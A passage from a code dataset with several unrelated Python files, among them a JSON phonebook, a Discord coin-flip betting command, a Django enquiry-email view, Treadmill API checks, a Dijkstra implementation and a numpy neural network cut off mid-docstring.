sub_predicates\n\n\nif __name__ == \"__main__\":\n    print(removeOr(\"namasye(x,y) | hello(s) | as(7)\"))","sub_path":"unit_testing/removeOr.py","file_name":"removeOr.py","file_ext":"py","file_size_in_byte":515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"6001997","text":"#!/usr/bin/python3\nfrom os import system,name\n# import sleep to show output for some time period \nfrom time import sleep \n \n# define our clear function \ndef clear(): \n \n    # for windows \n    if name == 'nt': \n        _ = system('cls') \n \n    # for mac and linux(here, os.name is 'posix') \n    else: \n        _ = system('clear')\nimport sys\nimport json\ndef listele():\n    with open(\"rehber.json\") as file:\n        rehber=json.load(file)\n    
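# Pretty-print the phonebook as a fixed-width table: a header row, then one\n    # aligned row per record (the column widths used here are this script's own choice).\n    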
print(f\"{'#':<4}{'Name':<15}{'Last-Name':<15}{'Phone_number':<20}\") \n for key in rehber:\n print(f'{key:<2}--{rehber[key][\"name\"]:<15}{rehber[key][\"last_name\"]:<15}{rehber[key][\"phone_number\"]:<20}')\n\nwhile True:\n print(\"-\"*54)\n print(\"[ 0 ] - list of records\")\n print(\"[ 1 ] - new records\")\n print(\"[ 2 ] - modify record\")\n print(\"[ 3 ] - delete record\")\n print(\"[q/Q] - Quit\")\n print(\"-\"*54)\n opt=input(\"enter your choice:\")\n if opt == \"0\": # listing \n listele() \n elif opt==\"1\": #new record\n with open(\"rehber.json\") as file:\n rehber=json.load(file)\n\n no = len(rehber)+1\n rehber[str(no)]={\"name\": \"\", \"last_name\": \"\", \"phone_number\": \"\"}\n rehber[str(no)][\"name\"] = input(\"Enter the Name:\")\n rehber[str(no)][\"last_name\"] = input(\"Enter the Last_Name:\")\n rehber[str(no)][\"phone_number\"] = input(\"Enter the phone_number:\")\n with open(\"rehber.json\",\"w\") as file:\n j=json.dumps(rehber, indent=2)\n file.write(j)\n file.close()\n clear()\n elif opt == \"2\": #modify\n listele()\n with open(\"rehber.json\") as file:\n rehber=json.load(file)\n i = str(input(\"Enter # to be modified:\"))\n # for key in list(rehber):\n # if rehber[key][\"name\"] == i.lower():\n # rehber[key][\"name\"] = input(\"Enter the Name:\")\n # rehber[key][\"last_name\"] = input(\"Enter the Last_Name:\")\n # rehber[key][\"phone_number\"] = input(\"Enter the phone_number:\")\n rehber[i][\"name\"] = input(f\"change name of {rehber[i]['name']} as:\")\n rehber[i][\"last_name\"] = input(f\"change last_name of {rehber[i]['last_name']} as:\")\n rehber[i][\"phone_number\"] = input(f\"change phone_number of {rehber[i]['phone_number']} as:\")\n \n with open(\"rehber.json\",\"w\") as file:\n j=json.dumps(rehber, indent=2)\n file.write(j)\n file.close()\n clear()\n\n elif opt == \"3\": #deleting...\n listele()\n with open(\"rehber.json\") as file:\n rehber=json.load(file)\n i=input(\"enter # to delete...\")\n for key in list(rehber):\n if key == str(i) :\n del rehber[key]\n \n with open(\"rehber.json\",\"w\") as file:\n j=json.dumps(rehber, indent=2)\n file.write(j)\n file.close()\n\n\n with open(\"rehber.json\") as file:\n rehber=json.load(file)\n \n i=1\n yr={}\n for v in rehber.values():\n yr[str(i)] = v\n i+=1\n rehber = yr\n\n with open(\"rehber.json\",\"w\") as file:\n j=json.dumps(rehber, indent=2)\n file.write(j)\n file.close()\n clear()\n \n elif opt.lower() == \"q\":\n break\n else:\n continue\n","sub_path":"phone_book.py","file_name":"phone_book.py","file_ext":"py","file_size_in_byte":3344,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"609663207","text":"import json\n\n# Load the username, if it has been stored previously.\n# Otherwise, prompt for the username and store it.\n\nfilename = 'project_files/remember_me.json'\n\n# try:\n# with open(filename, 'r') as file_obj:\n# content = json.load(file_obj)\n# except FileNotFoundError:\n# username = input('Please enter your name: \\n')\n# with open(filename, 'w') as file_obj:\n# json.dump(username, file_obj)\n# print('We will remember you ' + username + '! 
\\nSee you next time.')\n# else:\n#     print('Welcome back ' + content + '!')\n\n# Refactoring\n\n\ndef get_user_name():\n    \"\"\"Get stored username if available.\"\"\"\n    filename = 'project_files/remember_me.json'\n    try:\n        with open(filename, 'r') as file_object:\n            name = json.load(file_object)\n    except FileNotFoundError:\n        return None\n    else:\n        return name\n\ndef get_new_username():\n    username = input('Please enter your name: \\n')\n    filename = 'project_files/remember_me.json'\n    with open(filename, 'w') as file_obj:\n        json.dump(username, file_obj)\n    return username\n\n\ndef greet_user():\n    username = get_user_name()\n    if username:\n        print('Welcome back ' + username + '!')\n    else:\n        username = get_new_username()\n        print('We will remember you ' + username + '! \\nSee you next time.')\n\ngreet_user()\n","sub_path":"chapter1/remember_me.py","file_name":"remember_me.py","file_ext":"py","file_size_in_byte":1343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"454486698","text":"from Utils.CurrencyCommand import (\n\tCurrencyCommand, gambling_suspended, command_cooldown\n)\nfrom re import compile\nfrom random import randint, seed\nfrom os import urandom\nfrom math import ceil\nfrom discord import Embed, Colour\n\n\nclass Betflip(CurrencyCommand):\n\t\n\toutcome = compile(\n\t\tr\"(?i)^([ht])(ead|ail)?s?$\"\n\t)\n\t\n\t# This is added so it's the same as multiplying by 1.95\n\tmultiplier = 0.95\n\n\tcooldown = 2\n\t\n\tdef __init__(self, client):\n\t\tsuper().__init__(client)\n\t\tself.client = client\n\t\t\n\t\tself.name = \"betflip\"\n\t\tself.description = \"Bet on the outcome of a flipped coin\"\n\t\tself.perm_level = 0\n\t\tself.category = \"Currency\"\n\t\tself.aliases = [\n\t\t\t\"bf\"\n\t\t]\n\t\t\n\t\tself.usage = \"betflip <amount> <outcome>\"\n\n\t@gambling_suspended\n\t@command_cooldown(name=\"betflip\")\n\tasync def currency_run(self, _, message, *args):\n\t\tif len(args) < 1:\n\t\t\treturn await self.client.errors.MissingArgs(\"amount\").send(\n\t\t\t\tmessage.channel\n\t\t\t)\n\t\t\n\t\tif len(args) < 2:\n\t\t\treturn await self.client.errors.MissingArgs(\"outcome\").send(\n\t\t\t\tmessage.channel\n\t\t\t)\n\t\t\t\n\t\tif not args[0].isdigit() and args[1].isdigit():\n\t\t\tamount = int(args[1])\n\t\t\toutcome = args[0]\n\t\telif args[0].isdigit() and not args[1].isdigit():\n\t\t\tamount = int(args[0])\n\t\t\toutcome = args[1]\n\t\telse:\n\t\t\tif args[0].isdigit():\n\t\t\t\treturn await self.client.errors.InvalidArgs(\n\t\t\t\t\targs[1],\n\t\t\t\t\t\"outcome\"\n\t\t\t\t).send(message.channel)\n\t\t\t\n\t\t\treturn await self.client.errors.InvalidArgs(\n\t\t\t\targs[0],\n\t\t\t\t\"amount\"\n\t\t\t).send(message.channel)\n\t\t\t\n\t\tif not self.outcome.match(outcome):\n\t\t\treturn await self.client.errors.InvalidArgs(\n\t\t\t\toutcome,\n\t\t\t\t\"outcome\"\n\t\t\t).send(message.channel)\n\t\t\n\t\toutcome = self.outcome.match(outcome).group(1).lower()\n\t\t\n\t\tif not message.author.can_gamble(amount):\n\t\t\treturn await self.client.errors.MissingCurrency(\n\t\t\t\tmessage.author.cur\n\t\t\t).send(message.channel)\n\t\t\n\t\tseed(urandom(1024))\n\t\t\n\t\t# randint(1, 1000) is inclusive at both ends, so \"> 500\" gives a fair 500/1000 split\n\t\ttrue_outcome = \"h\" if randint(1, 1000) > 500 else \"t\"\n\t\t\n\t\tif outcome == true_outcome:\n\t\t\twin_total = ceil(amount * self.multiplier)\n\t\t\t\n\t\t\tmessage.author.cur += win_total\n\t\t\t\n\t\t\treturn await message.channel.send(\n\t\t\t\tembed=Embed(\n\t\t\t\t\tdescription=f\"Congrats! 
You won {win_total}\",\n\t\t\t\t\ttype=\"rich\",\n\t\t\t\t\tcolour=Colour.from_rgb(180, 111, 255)\n\t\t\t\t)\n\t\t\t)\n\t\n\t\tmessage.author.cur -= amount\n\t\t\n\t\tawait message.channel.send(\n\t\t\tembed=Embed(\n\t\t\t\tdescription=\"Better luck next time!\",\n\t\t\t\ttype=\"rich\",\n\t\t\t\tcolour=Colour.from_rgb(180, 111, 255)\n\t\t\t)\n\t\t)\n\n\ndef setup(client):\n\tclient.command_handler.add_command(\n\t\tBetflip(client)\n\t)\n","sub_path":"Extensions/Betflip.py","file_name":"Betflip.py","file_ext":"py","file_size_in_byte":2484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"385221705","text":"from django.shortcuts import render, redirect\nfrom .models import Contact\nfrom django.contrib import messages\nfrom django.core.mail import send_mail\n\ndef contacts(request):\n if request.method == \"POST\":\n listing_id = request.POST['listing_id']\n listing = request.POST['listing']\n name = request.POST['name']\n email = request.POST['email']\n phone = request.POST['phone']\n message = request.POST['message']\n user_id = request.POST['user_id']\n realtor_email = request.POST['realtor_email']\n\n # check if the user has already contacted for the same listing\n if request.user.is_authenticated:\n user_id = request.user.id\n has_contacted = Contact.objects.all().filter(listing_id=listing_id,user_id=user_id) \n if has_contacted:\n messages.error(request,\"You have already inquired for the same query\")\n return redirect('/listings/'+ listing_id)\n contact = Contact(listing=listing,listing_id=listing_id,\n name=name, email=email, phone=phone, message=message,\n user_id=user_id)\n contact.save()\n\n # sending mail to the user for the mail\n send_mail(\n 'Property Listing Enquiry',\n 'There has been an enquiry for '+ listing + '. 
Sign into admin panel for more info',\n            'encodeproject0001@gmail.com',\n            [realtor_email, 'parasmalhotra522@gmail.com'],\n            fail_silently=False\n        )\n        messages.success(request, 'Your response has been submitted. We will get back to you soon!')\n        return redirect('/listings/'+ listing_id) \n    else:\n        return redirect('index') \n    \n\n# Create your views here.\n","sub_path":"contacts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"422967786","text":"#!/usr/bin/env python\n\nimport argparse\nimport os\nimport sys\n\nfrom lib.config import enable_verbose_mode, get_target_arch\nfrom lib.util import execute_stdout\n\n\nSOURCE_ROOT = os.path.abspath(os.path.dirname(os.path.dirname(__file__)))\n\n\ndef main():\n    os.chdir(SOURCE_ROOT)\n\n    args = parse_args()\n    if args.verbose:\n        enable_verbose_mode()\n\n    # ./script/bootstrap\n    # ./script/update -t x64 --defines=''\n    # ./script/build --no_shared_library -t x64\n    # ./script/create-dist -c static_library -t x64 --no_zip\n    script_dir = os.path.join(SOURCE_ROOT, 'vendor', 'brightray', 'vendor',\n                              'libchromiumcontent', 'script')\n    bootstrap = os.path.join(script_dir, 'bootstrap')\n    update = os.path.join(script_dir, 'update')\n    build = os.path.join(script_dir, 'build')\n    create_dist = os.path.join(script_dir, 'create-dist')\n    execute_stdout([sys.executable, bootstrap])\n    execute_stdout([sys.executable, update, '-t', args.target_arch,\n                    '--defines', args.defines])\n    execute_stdout([sys.executable, build, '-R', '-t', args.target_arch])\n    execute_stdout([sys.executable, create_dist, '-c', 'static_library',\n                    '--no_zip', '-t', args.target_arch])\n\n\ndef parse_args():\n    parser = argparse.ArgumentParser(description='Build libchromiumcontent')\n    parser.add_argument('--target_arch',\n                        help='Specify the arch to build for')\n    parser.add_argument('--defines', default='',\n                        help='The definitions passed to gyp')\n    parser.add_argument('-v', '--verbose', action='store_true',\n                        help='Prints the output of the subprocesses')\n    return parser.parse_args()\n\n\nif __name__ == '__main__':\n    sys.exit(main())\n","sub_path":"script/build-libchromiumcontent.py","file_name":"build-libchromiumcontent.py","file_ext":"py","file_size_in_byte":1704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"158312895","text":"import logging\n\nfrom flask import Flask\nfrom flask import g\nfrom flask import render_template\nfrom flask import redirect\nfrom flask import request\nfrom flask import url_for\n\nfrom skautis import SkautisApi\n\napp = Flask(__name__)\napp.config.from_pyfile('config.py')\n\nlogger = logging.getLogger(__name__)\n\nskautis = SkautisApi(app.config['SKAUTIS_APPID'], test=True)\n\n\n@app.route('/hello')\ndef authors():\n    return 'Hello World!', 200\n\n@app.route('/')\ndef index():\n    # Render out the login page\n    return render_template('login.html', \n            login_link=skautis.get_login_url(),\n            app_name=app.config['APP_NAME'])\n\n@app.route('/login', methods=['POST'])\ndef login():\n    skautis_token = request.form['skautIS_Token']\n    skautis_idrole = request.form['skautIS_IDRole']\n    skautis_idunit = request.form['skautIS_IDUnit']\n    skautis_datelogout = request.form['skautIS_DateLogout']\n\n    user_info = skautis.UserManagement.UserDetail(skautis_token, None)\n    logout_link = skautis.get_logout_url(skautis_token)\n\n    return render_template('index.html',\n            login_link=skautis.get_login_url(),\n            
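# the token, role/unit ids and logout date below come straight from\n            # skautIS's login POST and are simply echoed to the template\n            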
app_name=app.config['APP_NAME'],\n skautis_token=skautis_token,\n skautis_idunit=skautis_idunit,\n skautis_idrole=skautis_idrole,\n skautis_datelogout=skautis_datelogout,\n user_info=user_info,\n logout_link=logout_link)\n\n@app.route('/logout', methods=['POST'])\ndef logout():\n return redirect(url_for('index'))\n","sub_path":"example/flask/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"579609793","text":"\"\"\"Verifies cell API.\n\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\nimport unittest\nimport logging\n\nfrom six.moves import urllib_parse\n\nfrom treadmill import cli\nfrom treadmill import context\nfrom treadmill import restclient\nfrom treadmill import zknamespace as z\nfrom treadmill import checkout as chk\n\n\n_LOGGER = logging.getLogger(__name__)\n\n_API_LOOKUP_BASE = 'http://{MASTER}:5800/api-lookup'\n\n\ndef _to_hostport(url):\n \"\"\"Convert *://host:port into (host, port) tuple.\"\"\"\n return tuple(urllib_parse.urlparse(url).netloc.split(':'))\n\n\ndef _thiscell(url):\n \"\"\"Check url host belongs to the cell.\"\"\"\n host, _port = _to_hostport(url)\n zkclient = context.GLOBAL.zk.conn\n return zkclient.exists(z.path.server(host))\n\n\ndef _parse_response(resp):\n \"\"\"Parse rest response\"\"\"\n return [(target['host'], str(target['port']))\n for target in resp.json()['targets']]\n\n\ndef _masters():\n \"\"\"Get masters\"\"\"\n hostports = context.GLOBAL.zk.url.split('@')[1].split('/')[0]\n return [item.split(':')[0] for item in hostports.split(',')]\n\n\ndef test():\n \"\"\"Check system API.\"\"\"\n\n try:\n adminapi = [url for url in context.GLOBAL.admin_api(None)\n if _thiscell(url)]\n except context.ContextError:\n adminapi = []\n\n try:\n cellapi = context.GLOBAL.cell_api(None)\n except context.ContextError:\n cellapi = []\n\n try:\n stateapi = context.GLOBAL.state_api(None)\n except context.ContextError:\n stateapi = []\n\n try:\n wsapi = context.GLOBAL.ws_api(None)\n except context.ContextError:\n wsapi = []\n\n class APITest(unittest.TestCase):\n \"\"\"API Test.\"\"\"\n\n for name, urls in [('adminapi', adminapi),\n ('cellapi', cellapi),\n ('stateapi', stateapi),\n ('wsapi', wsapi)]:\n @chk.T(APITest, urls=urls, name=name)\n def _test_count(self, urls, name):\n \"\"\"Checks {name} srv records count > 0.\"\"\"\n cli.out('%s: %r' % (name, urls))\n self.assertTrue(len(urls) > 0)\n\n @chk.T(APITest, urls=urls, name=name)\n def _test_api_lookup(self, urls, name):\n \"\"\"Test api lookup\"\"\"\n dns_result = [_to_hostport(url) for url in urls]\n for master in _masters():\n api_lookup_url = _API_LOOKUP_BASE.format(MASTER=master)\n cli.out('Api lookup : {} on {}'.format(name, master))\n if name == 'adminapi':\n resp = restclient.get(\n api_lookup_url,\n '/{}'.format(name),\n retries=0\n )\n rest_result = _parse_response(resp)\n self.assertTrue(all(x in rest_result for x in dns_result))\n else:\n resp = restclient.get(\n api_lookup_url,\n '/{}/{}'.format(name, context.GLOBAL.cell),\n retries=0\n )\n rest_result = _parse_response(resp)\n self.assertTrue(sorted(rest_result) == sorted(dns_result))\n\n for url in urls:\n\n @chk.T(APITest, url=url, name=name)\n def _test_is_up(self, url, name):\n \"\"\"Test {name} - {url} is up.\"\"\"\n del name\n cli.out(' Server up : {}'.format(url))\n host, port = _to_hostport(url)\n 
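# a raw TCP connect is enough here; HTTP-level health is asserted\n                # separately by _test_is_ok below\n                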
self.assertTrue(chk.connect(host, port))\n\n            @chk.T(APITest, url=url, name=name)\n            def _test_is_ok(self, url, name):\n                \"\"\"Test {name} - {url} is healthy.\"\"\"\n                del name\n                cli.out('  Server healthy : {}'.format(url))\n                self.assertTrue(chk.url_check(url))\n\n    return APITest\n","sub_path":"lib/python/treadmill/checkout/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":3943,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"512049485","text":"'''Shortest path in a graph - Dijkstra\r\n* Author: lil-q\r\n* Date: 2019-12-30\r\n*\r\n* Reference: \r\n*   1. https://github.com/vterron/dijkstra/blob/master/dijkstra.py\r\n'''\r\nimport heapq\r\n\r\nclass Graph:\r\n    \r\n    def __init__(self):\r\n        self.vertices = {}\r\n        \r\n    def add_vertex(self, name, edges):\r\n        self.vertices[name] = edges\r\n    \r\n    def shortest_path(self, start, finish):\r\n        distances = {} # distance from the start to each vertex\r\n        previous = {}  # predecessor on the path; note: on a shortest path each vertex has a unique predecessor\r\n        nodes = [] # priority queue\r\n\r\n        for vertex in self.vertices:\r\n            if vertex == start: # the source s gets path weight 0 (dis[s] = 0); every other vertex starts at infinity\r\n                distances[vertex] = 0\r\n                heapq.heappush(nodes, [0, vertex])\r\n            else:\r\n                distances[vertex] = float('inf')\r\n                heapq.heappush(nodes, [float('inf'), vertex])\r\n            previous[vertex] = None\r\n\r\n        while nodes:\r\n            smallest = heapq.heappop(nodes)[1] # pop the first node off the priority queue\r\n            if smallest == finish: # save the path\r\n                path = []\r\n                cur = smallest\r\n                while cur: # walk back to the start, whose predecessor is None\r\n                    path.append(cur)\r\n                    cur = previous[cur]\r\n                path.reverse()\r\n            if distances[smallest] == float('inf'): # the remaining nodes are unreachable\r\n                break \r\n            for neighbor in self.vertices[smallest]: # visit the neighbouring nodes\r\n                alt = distances[smallest] + self.vertices[smallest][neighbor] \r\n                if alt < distances[neighbor]: # found a shorter path, so update nodes and previous\r\n                    previous[neighbor] = smallest\r\n                    distances[neighbor] = alt\r\n                    for n in nodes:\r\n                        if n[1] == neighbor:\r\n                            n[0] = alt\r\n                            break\r\n                    heapq.heapify(nodes)\r\n            #print(distances,nodes)\r\n        return distances[finish], path\r\n    \r\n    def __str__(self):\r\n        return str(self.vertices)\r\n\r\nif __name__ == '__main__':\r\n    g = Graph()\r\n    g.add_vertex('A', {'B': 4, 'C': 2, 'D': 3})\r\n    g.add_vertex('B', {'A': 4, 'E': 2, 'F': 5})\r\n    g.add_vertex('C', {'A': 2, 'G': 1})\r\n    g.add_vertex('D', {'A': 3, 'G': 2})\r\n    g.add_vertex('E', {'B': 2, 'F': 4})\r\n    g.add_vertex('F', {'B': 5, 'E': 4, 'G': 3})\r\n    g.add_vertex('G', {'C': 1, 'D': 2, 'F': 3})\r\n    print(g.shortest_path('A', 'B'))\r\n    print(g.shortest_path('A', 'C'))\r\n    print(g.shortest_path('A', 'D'))\r\n    print(g.shortest_path('A', 'E'))\r\n    print(g.shortest_path('A', 'F'))\r\n    print(g.shortest_path('A', 'G'))","sub_path":"Graph/graph-Dijkstra.py","file_name":"graph-Dijkstra.py","file_ext":"py","file_size_in_byte":2866,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"141567478","text":"\"\"\"A user-defined feedforward neural network in Numpy.\n\nUsage:\n    Modify the 'params' dictionary, then run to watch it train\n\nDependencies:\n    numpy (pip install numpy)\n    mnist_web (pip install mnist_web)\n    cifar10_web (pip install cifar10_web)\n\nResults:\n    MNIST\n    =---------------------------------------=\n    | Model                         val acc |\n    =---------------------------------------=\n    | Softmax regression              91.3% |\n    | Two-layer ReLU 500-300          97.8% |\n    | One-layer ReLU 800              97.9% |\n    | One-layer ReLU 1600             97.9% |\n    | Two-layer ReLU 1000-600         97.9% |\n    | Two-layer ReLU 2000-1200        98.0% |\n    | Two-layer ReLU 3200-1600        97.9% |\n    | ReLU 4000-4000-4000             98.2% |\n    
=---------------------------------------=\n Test acc of best model: 97.4%\n\n CIFAR-10\n =---------------------------------------=\n | Model val acc |\n =---------------------------------------=\n | Softmax regression 36.5% |\n | Two-layer ReLU 500-300 42.6% |\n | One-layer ReLU 800 44.5% |\n | One-layer ReLU 1600 44.1% |\n | Two-layer ReLU 1000-600 44.8% |\n | Two-layer ReLU 2000-1200 43.5% |\n | Two-layer ReLU 3200-1600 43.2% |\n =---------------------------------------=\n Test acc of best model: 42.1%\n Top 5 accuracy is about 88.0%\n\nGood settings:\n MNIST\n params = {\n # ------------------------------------ Architecture\n 'layers': [\n ('Relu', 800),\n ('Softmax', 10),\n ],\n # ------------------------------------ Data\n 'dataset': 'mnist',\n 'val_proportion': 0.1,\n # ------------------------------------ Training\n 'minibatch_size': 100,\n 'eta': 2.0,\n 'eta_taper': 0.1,\n # Stops at first of these conditions\n 'n_epochs': 40,\n 'patience': 4,\n # ------------------------------------ Regularization\n 'input_keep_prob': 0.8,\n 'hidden_keep_prob': 0.5,\n 'l1_coef': 1e-5,\n 'l2_coef': 1e-5,\n # Soft gradient clipping\n 'clipping_threshold': 10,\n # ------------------------------------ Reporting\n 'cost': True,\n 'val_acc': True,\n 'top_k_val_acc': False, # set integer k\n # ------------------------------------ Debugging\n 'numerical_gradient_checking': False,\n }\n\n CIFAR-10\n params = {\n # ------------------------------------ Architecture\n 'layers': [\n ('Relu', 1000),\n ('Relu', 600),\n ('Softmax', 10),\n ],\n # ------------------------------------ Data\n 'dataset': 'cifar10',\n 'val_proportion': 0.1,\n # ------------------------------------ Training\n 'minibatch_size': 100,\n 'eta': 0.5,\n 'eta_taper': 0.01,\n # Stops at first of these conditions\n 'n_epochs': 40,\n 'patience': 4,\n # ------------------------------------ Regularization\n 'input_keep_prob': 0.8,\n 'hidden_keep_prob': 0.5,\n 'l1_coef': 1e-5,\n 'l2_coef': 1e-5,\n # Soft gradient clipping\n 'clipping_threshold': 10,\n # ------------------------------------ Reporting\n 'cost': True,\n 'val_acc': True,\n 'top_k_val_acc': 5, # set integer k\n # ------------------------------------ Debugging\n 'numerical_gradient_checking': False,\n }\n\nNotes:\n The optimal one-hidden-layer size seems to be 800 or 1000\n Dropout yields ~0.6% test accuracy\n L1 and L2 regularization together yield ~1.5% test accuracy\n Checking numerical gradients should be done after implementing a\n brand new custom type of layer.\n Very computationally heavy. Needs two forward passes and\n two cost passes for every weight in the network. That means\n for a (784, 30, 10) network you will have 47,640 forward\n passes to compute numerical gradients. 
That's the equivalent\n    of training for 40 epochs with minibatches of size 100.\n    Expect it to run for 20-30 minutes\n\"\"\"\n\nfrom random import shuffle\n\nimport numpy as np\nfrom mnist_web import mnist\nfrom cifar10_web import cifar10\n\n\nparams = {\n    # ------------------------------------ Architecture\n    'layers': [\n        ('Relu', 1000),\n        ('Relu', 600),\n        ('Softmax', 10),\n    ],\n    # ------------------------------------ Data\n    'dataset': 'cifar10',\n    'val_proportion': 0.1,\n    # ------------------------------------ Training\n    'minibatch_size': 100,\n    'eta': 0.5,\n    'eta_taper': 0.01,\n    # Stops at first of these conditions\n    'n_epochs': 40,\n    'patience': 4,\n    # ------------------------------------ Regularization\n    'input_keep_prob': 0.8,\n    'hidden_keep_prob': 0.5,\n    'l1_coef': 1e-5,\n    'l2_coef': 1e-5,\n    # Soft gradient clipping\n    'clipping_threshold': 10,\n    # ------------------------------------ Reporting\n    'cost': True,\n    'val_acc': True,\n    'top_k_val_acc': 5, # set integer k\n    # ------------------------------------ Debugging\n    'numerical_gradient_checking': False,\n}\n\n# Descriptions\n\"\"\"------------------------------------------------------\n'layers'\n    Type: list of tuples of (str, int)\n    Desc: desired layers in network\n    Example: [('Relu', 1400), ('Sigmoid', 800), ('Softmax', 10)]\n    Notes:\n        -- If learning rate is too large ReLUs will die\n        -- Sigmoid and Tanh can suffer from saturation\n\n'dataset'\n    Type: str\n    Desc: 'mnist' or 'cifar10'\n\n'val_proportion'\n    Type: float\n    Desc: what share of train set should be made validation\n\n'minibatch_size'\n    Type: int\n    Notes:\n        -- Smaller means more training iterations and weight\n           updates per epoch\n\n'eta'\n    Type: float\n    Desc: learning rate\n    Notes:\n        -- 1.0 works well for mnist\n        -- 0.1 works well for cifar10\n\n'eta_taper'\n    Type: float\n    Desc: constant of decrease applied to learning rate\n    Notes:\n        -- SGD update rule is eta / (1 + epoch * eta_taper) * gradient\n        -- A taper of 0.01 will reduce the learning rate by about 20% at epoch 25\n        -- A taper of 0.1 tends to work well\n\n'n_epochs'\n    Type: int\n    Desc: max number of training epochs allowed\n\n'patience'\n    Type: int\n    Desc: max number of training epochs allowed without a new best cost\n\n'clipping_threshold'\n    Type: int\n    Desc: Scale each layer's SGD update inversely proportionally to the\n          amount by which the Frobenius norm of its Jacobian exceeds this\n          number. In short, a lower threshold means smaller weight updates.\n    Note:\n        -- Jacobian norms for a ReLU layer of 1000 nodes start around 32 and\n           decrease throughout training. 
That means a clipping threshold of\n 100 will probably never take effect.\n\n'input_keep_prob'\n Type: float\n Desc: (1 - dropout rate) for input layer activation\n Notes:\n -- 0.8 is common\n\n'hidden_keep_prob'\n Type: float\n Desc: (1 - dropout rate) for hidden layer activation\n Notes:\n -- 0.5 is common\n\n'l1_coef'\n Type: float\n Desc: scalar penalty applied to l1 norm of weights\n\n'l2_coef'\n Type: float\n Desc: scalar penalty applied to l2 norm of weights\n\n'numerical_gradient_checking'\n Type: bool\n Desc: True to numerically validate gradients at end of training\n Notes:\n -- Takes about 30 minutes to run\n------------------------------------------------------\"\"\"\n\n\nclass Network(object):\n \"\"\"List of Layer instances.\"\"\"\n\n def __init__(self):\n \"\"\"Initialize an empty list to hold layers.\"\"\"\n self._layers = []\n\n def __getitem__(self, index):\n \"\"\"Return layer at index.\"\"\"\n return self._layers[index]\n\n def __len__(self):\n \"\"\"Return number of layers.\"\"\"\n return len(self._layers)\n\n def __repr__(self):\n \"\"\"Return a multi-line string describing layers.\"\"\"\n return '\\n'.join(str(layer) for layer in self._layers)\n\n def append(self, layer_type, layer_size):\n \"\"\"Append layer to self.\"\"\"\n self._layers.append(layer_type(layer_size))\n\n def forward(self, data, input_keep_prob=1, hidden_keep_prob=1):\n \"\"\"Push data forward through self.\"\"\"\n # Copy input data so dropout doesn't permanently alter our dataset\n activation = data.copy()\n\n if input_keep_prob < 1:\n # Dropout input layer's activation\n activation *= np.random.binomial(\n n=1, p=input_keep_prob, size=activation.shape)\n\n # Feed forward (no dropout on last layer)\n for layer in self[:-1]:\n activation = layer.forward(activation)\n\n if hidden_keep_prob < 1:\n # Dropout hidden layer's activation\n activation *= np.random.binomial(\n n=1, p=hidden_keep_prob, size=activation.shape)\n\n # Forward through last layer (no dropout)\n self.output = self[-1].forward(activation)\n\n def backward(self, labels, l1_coef, l2_coef):\n \"\"\"Pull error backward through self.\"\"\"\n for layer in reversed(self):\n labels = layer.backward(labels, l1_coef, l2_coef)\n\n def predict(self):\n \"\"\"Return integer class predictions.\"\"\"\n return self.output.argmax(1)\n\n def cost(self, onehot_labels, l1_coef, l2_coef):\n \"\"\"Return mean negative log likelihood with regularization.\"\"\"\n correct_class_indices = np.where(onehot_labels)[1]\n correct_class_probs = np.choose(correct_class_indices, self.output.T)\n # Don't pass values smaller than 1e-10 to log\n correct_class_probs = np.maximum(correct_class_probs, 1e-10)\n mean_negative_log_likelihood = -np.mean(np.log(correct_class_probs))\n\n l1, l2 = 0, 0\n for layer in self:\n l1 += np.linalg.norm(layer.w, ord=1)\n l2 += np.linalg.norm(layer.w, ord='fro')\n n_examples = len(onehot_labels)\n l1 *= l1_coef / n_examples\n l2 *= l2_coef / n_examples\n\n return mean_negative_log_likelihood + l1 + l2\n\n def accuracy(self, onehot_labels):\n \"\"\"Return accuracy of predictions against correct labels.\"\"\"\n return np.mean(self.output.argmax(1) == onehot_labels.argmax(1))\n\n def top_k_accuracy(self, onehot_labels, k):\n \"\"\"Return accuracy of true label being among top k predictions.\"\"\"\n labels = onehot_labels.argmax(1)\n top_5s = self.output.argsort(1)[:, -k:]\n return np.mean([label in top5 for label, top5 in zip(labels, top_5s)])\n\n def sgd(self, eta, eta_taper, epoch, clipping_threshold):\n \"\"\"Update weights using their 
stored Jacobians with vanilla SGD.\n\n        :type eta: float\n        :param eta: learning rate (\"step size\")\n\n        :type eta_taper: float\n        :param eta_taper: constant controlling the rate of decrease;\n            set eta_taper = 0 for a constant learning rate\n\n        :type epoch: int\n        :param epoch: the current epoch count\n\n        :type clipping_threshold: int or float\n        :param clipping_threshold: scale Jacobians whose Frobenius\n            norm exceeds this value\n        \"\"\"\n        for layer in self:\n            if clipping_threshold is not None:\n                # Clip gradients\n                frobenius_norm = np.linalg.norm(layer.dw, 'fro')\n                if frobenius_norm > clipping_threshold:\n                    layer.dw *= clipping_threshold / frobenius_norm\n\n            # Update weights\n            layer.w -= (eta / (1 + epoch * eta_taper)) * layer.dw\n            layer.b -= (eta / (1 + epoch * eta_taper)) * layer.db\n\n    def numerical_gradient_check(self, data, labels):\n        \"\"\"Check all layers' analytical Jacobians against numerical gradients.\n\n        Note:\n            Very computationally heavy. Needs two forward passes and\n            two cost passes for every weight in the network. That means\n            for a (784, 30, 10) network you will have 47,640 forward\n            passes to compute numerical gradients. That's the equivalent\n            of training for 80 epochs with minibatches of size 100.\n            Expect it to run for about 20-30 minutes.\n\n        :type data: ndarray\n        :param data: row per example; col per feature\n\n        :type labels: ndarray\n        :param labels: each row a class label (integer or 